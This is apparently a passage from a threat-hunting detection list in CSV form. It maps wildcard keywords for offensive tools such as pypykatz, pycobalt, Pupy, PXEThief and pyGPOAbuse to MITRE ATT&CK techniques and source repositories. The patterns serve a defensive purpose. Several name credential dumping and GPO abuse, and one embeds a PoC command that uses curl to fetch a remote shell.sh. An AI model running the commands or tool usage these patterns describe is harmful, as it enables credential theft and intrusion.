+"*pwnkit64decoded.c*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z"
+"*pwnsauc3/RWXFinder*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z"
+"*pwsafe2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*pxethief *","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z"
+"*pxethief.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z"
+"*py2exe *","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe*.exe *","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe*.msi *","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe*.py*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false 
positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe-*.tar.gz*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe-*.whl*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe.build_exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe.freeze*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe.git*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - 
TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe_setuptools.py*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*py2exe-master.zip*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*pycobalt.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*pycobalt/aggressor*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*pycobalt_debug_on*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*pycobalt_path*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*pycobalt_python*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pycobalt_timeout*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pydictor*","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","10","2936","618","2023-01-11T13:02:06Z","2016-08-17T08:16:56Z" +"*pyexec -c *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pyexec --file*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PyExec-main.*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*pygpoabuse * -hashes lm:* -gpo-id *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pygpoabuse.py*","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"*pyherion.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","0","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*pyinstaller *.py*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyinstaller netexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*pyinstaller.exe*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyinstaller/tarball*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*pyinstaller-script.py*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyLAPS.py --action get -d * -u * -p * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyLAPS-main*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*pyMalleableC2*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" +"*pymultitor*","offensive_tool_keyword","pymultitor","Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP","T1071.001 - T1071.004 - T1055.008","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/realgam3/pymultitor","1","0","N/A","N/A","6","543","116","2022-08-28T22:06:01Z","2013-09-28T15:55:49Z" +"*pypykatz *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz lsa minidump *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*pypykatz lsa minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","0","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.commons*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.dpapi*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.exe*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.git*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.kerberos*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.lsadecryptor*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.registry*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*pypykatz_rekall.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatzClass*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
+"*pypykatzfile*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*pypykatz-master.zip*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pyrdp_output -*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-clonecert.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-convert.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-mitm.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library 
